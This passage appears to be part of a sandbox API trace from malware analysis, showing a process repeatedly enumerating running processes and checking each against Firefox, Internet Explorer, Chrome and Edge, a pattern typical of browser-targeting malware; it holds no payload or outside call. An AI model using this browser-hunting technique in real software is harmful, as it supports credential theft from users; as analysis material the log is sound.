th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ruby.exe")) returned 1 [0163.429] lstrcmpiA (lpString1="ruby.exe", lpString2="firefox.exe") returned 1 [0163.429] lstrcmpiA (lpString1="ruby.exe", lpString2="iexplore.exe") returned 1 [0163.429] lstrcmpiA (lpString1="ruby.exe", lpString2="chrome.exe") returned 1 [0163.429] lstrcmpiA (lpString1="ruby.exe", lpString2="microsoftedgecp.exe") returned 1 [0163.429] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="zoodiffer.exe")) returned 1 [0163.429] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="firefox.exe") returned 1 [0163.429] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="iexplore.exe") returned 1 [0163.429] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="chrome.exe") returned 1 [0163.429] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="microsoftedgecp.exe") returned 1 [0163.429] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="smith.exe")) returned 1 [0163.430] lstrcmpiA (lpString1="smith.exe", lpString2="firefox.exe") returned 1 [0163.430] lstrcmpiA (lpString1="smith.exe", lpString2="iexplore.exe") returned 1 [0163.430] lstrcmpiA (lpString1="smith.exe", lpString2="chrome.exe") returned 1 [0163.430] lstrcmpiA (lpString1="smith.exe", lpString2="microsoftedgecp.exe") returned 1 [0163.430] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spicedespite.exe")) returned 1 [0163.430] lstrcmpiA (lpString1="spicedespite.exe", lpString2="firefox.exe") returned 1 [0163.430] lstrcmpiA (lpString1="spicedespite.exe", lpString2="iexplore.exe") returned 1 [0163.430] lstrcmpiA (lpString1="spicedespite.exe", lpString2="chrome.exe") returned 1 [0163.430] lstrcmpiA (lpString1="spicedespite.exe", lpString2="microsoftedgecp.exe") returned 1 [0163.430] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x644, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wooden.exe")) returned 1 [0163.431] lstrcmpiA (lpString1="wooden.exe", lpString2="firefox.exe") returned 1 [0163.431] lstrcmpiA (lpString1="wooden.exe", lpString2="iexplore.exe") returned 1 [0163.431] lstrcmpiA (lpString1="wooden.exe", lpString2="chrome.exe") returned 1 [0163.431] lstrcmpiA (lpString1="wooden.exe", lpString2="microsoftedgecp.exe") returned 1 [0163.431] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dallasr.exe")) returned 1 [0163.431] lstrcmpiA (lpString1="dallasr.exe", lpString2="firefox.exe") returned -1 [0163.431] lstrcmpiA (lpString1="dallasr.exe", lpString2="iexplore.exe") returned -1 [0163.432] lstrcmpiA (lpString1="dallasr.exe", lpString2="chrome.exe") returned 1 [0163.432] lstrcmpiA (lpString1="dallasr.exe", lpString2="microsoftedgecp.exe") returned -1 [0163.432] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="bags shakira tourism.exe")) returned 1 [0163.432] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="firefox.exe") returned -1 [0163.432] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="iexplore.exe") returned -1 [0163.432] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="chrome.exe") returned -1 [0163.432] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="microsoftedgecp.exe") returned -1 [0163.432] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="constadvertisement.exe")) returned 1 [0163.433] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="firefox.exe") returned -1 [0163.433] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="iexplore.exe") returned -1 [0163.433] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="chrome.exe") returned 1 [0163.433] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="microsoftedgecp.exe") returned -1 [0163.433] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sensors-democrat.exe")) returned 1 [0163.433] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="firefox.exe") returned 1 [0163.433] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="iexplore.exe") returned 1 [0163.433] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="chrome.exe") returned 1 [0163.433] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="microsoftedgecp.exe") returned 1 [0163.433] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="doctrine alcohol.exe")) returned 1 [0163.434] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="firefox.exe") returned -1 [0163.434] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="iexplore.exe") returned -1 [0163.434] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="chrome.exe") returned 1 [0163.434] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="microsoftedgecp.exe") returned -1 [0163.434] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="population openings.exe")) returned 1 [0163.435] lstrcmpiA (lpString1="population openings.exe", lpString2="firefox.exe") returned 1 [0163.435] lstrcmpiA (lpString1="population openings.exe", lpString2="iexplore.exe") returned 1 [0163.435] lstrcmpiA (lpString1="population openings.exe", lpString2="chrome.exe") returned 1 [0163.435] lstrcmpiA (lpString1="population openings.exe", lpString2="microsoftedgecp.exe") returned 1 [0163.435] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0163.435] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="firefox.exe") returned 1 [0163.435] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="iexplore.exe") returned 1 [0163.435] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="chrome.exe") returned 1 [0163.435] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="microsoftedgecp.exe") returned 1 [0163.435] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0163.436] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0163.436] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0163.436] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0163.436] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0163.436] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0163.436] lstrcmpiA (lpString1="sppsvc.exe", lpString2="firefox.exe") returned 1 [0163.436] lstrcmpiA (lpString1="sppsvc.exe", lpString2="iexplore.exe") returned 1 [0163.436] lstrcmpiA (lpString1="sppsvc.exe", lpString2="chrome.exe") returned 1 [0163.436] lstrcmpiA (lpString1="sppsvc.exe", lpString2="microsoftedgecp.exe") returned 1 [0163.436] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0163.437] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0163.437] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0163.437] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0163.437] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0163.437] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0163.438] lstrcmpiA (lpString1="taskhost.exe", lpString2="firefox.exe") returned 1 [0163.438] lstrcmpiA (lpString1="taskhost.exe", lpString2="iexplore.exe") returned 1 [0163.438] lstrcmpiA (lpString1="taskhost.exe", lpString2="chrome.exe") returned 1 [0163.438] lstrcmpiA (lpString1="taskhost.exe", lpString2="microsoftedgecp.exe") returned 1 [0163.438] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0163.438] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0163.438] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0163.438] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0163.438] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0163.438] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x20, th32ParentProcessID=0x1b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0163.439] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0163.439] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0163.439] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0163.439] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0163.439] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0163.439] lstrcmpiA (lpString1="taskeng.exe", lpString2="firefox.exe") returned 1 [0163.439] lstrcmpiA (lpString1="taskeng.exe", lpString2="iexplore.exe") returned 1 [0163.439] lstrcmpiA (lpString1="taskeng.exe", lpString2="chrome.exe") returned 1 [0163.439] lstrcmpiA (lpString1="taskeng.exe", lpString2="microsoftedgecp.exe") returned 1 [0163.439] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0163.440] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="firefox.exe") returned 1 [0163.440] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="iexplore.exe") returned 1 [0163.440] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="chrome.exe") returned 1 [0163.440] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="microsoftedgecp.exe") returned 1 [0163.440] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x8b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0163.440] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0163.440] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0163.441] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0163.441] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0163.441] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x92c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0163.441] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0163.441] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0163.441] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0163.441] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0163.441] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x924, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0163.442] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0163.442] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0163.442] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0163.442] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0163.442] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x958, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0163.442] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0163.442] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0163.442] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0163.442] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0163.442] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x958, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 0 [0163.443] CloseHandle (hObject=0xd4) returned 1 [0163.443] Sleep (dwMilliseconds=0x3e8) [0165.088] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xd4 [0165.090] Process32First (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0165.091] lstrcmpiA (lpString1="[System Process]", lpString2="firefox.exe") returned -1 [0165.091] lstrcmpiA (lpString1="[System Process]", lpString2="iexplore.exe") returned -1 [0165.091] lstrcmpiA (lpString1="[System Process]", lpString2="chrome.exe") returned -1 [0165.091] lstrcmpiA (lpString1="[System Process]", lpString2="microsoftedgecp.exe") returned -1 [0165.091] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0165.092] lstrcmpiA (lpString1="System", lpString2="firefox.exe") returned 1 [0165.092] lstrcmpiA (lpString1="System", lpString2="iexplore.exe") returned 1 [0165.092] lstrcmpiA (lpString1="System", lpString2="chrome.exe") returned 1 [0165.092] lstrcmpiA (lpString1="System", lpString2="microsoftedgecp.exe") returned 1 [0165.092] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0165.092] lstrcmpiA (lpString1="smss.exe", lpString2="firefox.exe") returned 1 [0165.092] lstrcmpiA (lpString1="smss.exe", lpString2="iexplore.exe") returned 1 [0165.092] lstrcmpiA (lpString1="smss.exe", lpString2="chrome.exe") returned 1 [0165.092] lstrcmpiA (lpString1="smss.exe", lpString2="microsoftedgecp.exe") returned 1 [0165.092] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0165.093] lstrcmpiA (lpString1="csrss.exe", lpString2="firefox.exe") returned -1 [0165.093] lstrcmpiA (lpString1="csrss.exe", lpString2="iexplore.exe") returned -1 [0165.093] lstrcmpiA (lpString1="csrss.exe", lpString2="chrome.exe") returned 1 [0165.093] lstrcmpiA (lpString1="csrss.exe", lpString2="microsoftedgecp.exe") returned -1 [0165.093] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0165.094] lstrcmpiA (lpString1="wininit.exe", lpString2="firefox.exe") returned 1 [0165.094] lstrcmpiA (lpString1="wininit.exe", lpString2="iexplore.exe") returned 1 [0165.094] lstrcmpiA (lpString1="wininit.exe", lpString2="chrome.exe") returned 1 [0165.094] lstrcmpiA (lpString1="wininit.exe", lpString2="microsoftedgecp.exe") returned 1 [0165.094] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0165.094] lstrcmpiA (lpString1="csrss.exe", lpString2="firefox.exe") returned -1 [0165.094] lstrcmpiA (lpString1="csrss.exe", lpString2="iexplore.exe") returned -1 [0165.094] lstrcmpiA (lpString1="csrss.exe", lpString2="chrome.exe") returned 1 [0165.094] lstrcmpiA (lpString1="csrss.exe", lpString2="microsoftedgecp.exe") returned -1 [0165.094] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0165.095] lstrcmpiA (lpString1="winlogon.exe", lpString2="firefox.exe") returned 1 [0165.095] lstrcmpiA (lpString1="winlogon.exe", lpString2="iexplore.exe") returned 1 [0165.095] lstrcmpiA (lpString1="winlogon.exe", lpString2="chrome.exe") returned 1 [0165.095] lstrcmpiA (lpString1="winlogon.exe", lpString2="microsoftedgecp.exe") returned 1 [0165.095] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0165.096] lstrcmpiA (lpString1="services.exe", lpString2="firefox.exe") returned 1 [0165.096] lstrcmpiA (lpString1="services.exe", lpString2="iexplore.exe") returned 1 [0165.096] lstrcmpiA (lpString1="services.exe", lpString2="chrome.exe") returned 1 [0165.096] lstrcmpiA (lpString1="services.exe", lpString2="microsoftedgecp.exe") returned 1 [0165.096] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0165.096] lstrcmpiA (lpString1="lsass.exe", lpString2="firefox.exe") returned 1 [0165.096] lstrcmpiA (lpString1="lsass.exe", lpString2="iexplore.exe") returned 1 [0165.096] lstrcmpiA (lpString1="lsass.exe", lpString2="chrome.exe") returned 1 [0165.096] lstrcmpiA (lpString1="lsass.exe", lpString2="microsoftedgecp.exe") returned -1 [0165.096] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0165.097] lstrcmpiA (lpString1="lsm.exe", lpString2="firefox.exe") returned 1 [0165.097] lstrcmpiA (lpString1="lsm.exe", lpString2="iexplore.exe") returned 1 [0165.097] lstrcmpiA (lpString1="lsm.exe", lpString2="chrome.exe") returned 1 [0165.097] lstrcmpiA (lpString1="lsm.exe", lpString2="microsoftedgecp.exe") returned -1 [0165.097] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0165.098] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0165.098] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0165.098] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0165.098] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0165.098] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0165.098] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0165.098] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0165.098] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0165.098] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0165.098] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0165.099] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0165.099] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0165.099] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0165.099] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0165.099] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0165.100] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0165.100] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0165.100] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0165.100] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0165.100] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x20, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0165.100] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0165.100] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0165.100] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0165.100] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0165.100] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0165.101] lstrcmpiA (lpString1="audiodg.exe", lpString2="firefox.exe") returned -1 [0165.101] lstrcmpiA (lpString1="audiodg.exe", lpString2="iexplore.exe") returned -1 [0165.101] lstrcmpiA (lpString1="audiodg.exe", lpString2="chrome.exe") returned -1 [0165.101] lstrcmpiA (lpString1="audiodg.exe", lpString2="microsoftedgecp.exe") returned -1 [0165.101] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, 